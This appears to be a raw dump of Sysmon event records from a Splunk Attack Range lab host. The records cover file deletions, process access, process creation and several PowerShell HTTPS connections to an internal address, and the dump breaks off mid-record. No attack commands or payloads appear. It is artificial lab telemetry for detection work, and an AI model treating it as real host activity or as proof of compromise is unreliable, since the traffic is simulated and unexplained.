insufficient disk space 23542300x800000000000000035127359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:16.972{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A04B57BA44F06D46AF4E3A9331A377C5,SHA256=4692A95D72DC49E1A7D9940BA8B3D24E96C53AB8025DD588BB6D23C876226094,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:17.991{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=44ABF223664FE1EE7B828ABE769571CE,SHA256=36D7FE740A71C931132B9900721470733D532997513E9F88F90FAF1EDE95CD3D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:41.985{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62018-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:17.025{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=700F9E41BD3B30CF4F4A277E6145A7E7,SHA256=4BBF44EA935309C1BB92F7801D9096220EF67794DFA2DE96185AA6BB63571E4F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:43.418{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62019-false10.0.1.12-8000- 23542300x800000000000000035127363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:19.008{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=431D8D6B4045CFB9AECC80A813D32CE4,SHA256=01884674891E8FD68B51BD3721B83DC822D97F6592BB4E2E7B43E8857028A8E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:20.022{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3B519BB29F54F087A3EF2F98B512F2C7,SHA256=D6B2F56896CEE28B8710400F5249FC5FB9C8EE867D71FED2D0184B869F64D6FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:21.038{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F6E3B509212D86EF5FDC0F5B42B605C,SHA256=40CF2F659D04BE74E66DAE80D2938860D8C91977215466B1198926E89172ACD2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:22.828{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=65A67E38A2445B05C1D0FD59B78F8E6C,SHA256=A3FBE367B983E1EDF56A41AED87CED8561E7E16D56E5266294938822BC0F8B66,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:22.068{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCB0A35EE71F6326C68D601E9DC20063,SHA256=BE77211C06DCEEE6F19A4147D7E9ECB0C3A9F3A48B8B2241E369151E43D9C8E6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:23.123{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC0C9DDCD732CAC6EEA648CFAC444BC4,SHA256=B8962EB21EDC8EBD10CD017EB7F0FEF8B27BC5DC0008702D10CF899D8F951CA6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:48.000{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local62020-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035127371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:24.137{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=111BDDE10EEF53AAD5AE81A6B0115768,SHA256=F610B7D9ECE31E1FABF3B4E1A31657E1FC9F555E798F3C6E199B076F703707D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:25.168{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4BA82A2AE045947974070C2720250B23,SHA256=4C9DAB7B7A6C1E4D34A26C1E6AFFCC3DDE04317D661E6912852C65E21F4460CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:49.201{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local62021-false10.0.1.12-8000- 10341000x800000000000000035127382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:26.867{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8256-613A-AA96-03000000C801}6256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:26.867{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:26.867{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:26.867{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:26.867{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:26.867{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-8256-613A-AA96-03000000C801}6256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:26.867{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8256-613A-AA96-03000000C801}6256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:26.852{B81B27B7-8256-613A-AA96-03000000C801}6256C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:26.185{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=700D1FAFB29AF2CBA91602ECAF414E5C,SHA256=F676CCE41C06C5EA625F2EFAE1F335954E871C8AA9C34CC81B0E24968B1BB42B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127395Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:27.885{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6B22C980D277A5AB7B34DD59AAE82C87,SHA256=0419D6A591EA7582BE8A02146788C772E3F99DD88DCE97DAE7DBB7F8875EAF3D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:27.885{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=040CF3FAE5F322D9F0BEF7ECA4C74A3F,SHA256=D0E2842E602968CBC3C3BDA677777AAC25BAD50B76BB56E8D59B65853206CB9A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:27.850{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A3781407A59881DEB5180C7E4F5E4EDC,SHA256=15106CACAB9D0B1A512A73EC7539EA634BAB6FDF29395030D51455E2A512B278,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035127392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:27.703{B81B27B7-8257-613A-AB96-03000000C801}34486440C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:27.550{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-8257-613A-AB96-03000000C801}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:27.550{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:27.550{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:27.550{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:27.550{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035127386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:27.550{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-8257-613A-AB96-03000000C801}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035127385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:27.550{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-8257-613A-AB96-03000000C801}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035127384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:27.535{B81B27B7-8257-613A-AB96-03000000C801}3448C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035127383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:27.266{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A3741242ECCC03E1F38993AF23326F7,SHA256=407282BDACC184F0EE6D818ED9043D0BADABFDEF4046B4F3CB0DD594436E3610,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035127397Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:53:28.287{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B8459E33975C4E789DF72FD8A5F8D73,SHA256=C43A434EB1C8ED6F64DC69399209F582F13DD1FB70AA86F64B94DD4F15F7B7F6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035127396Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 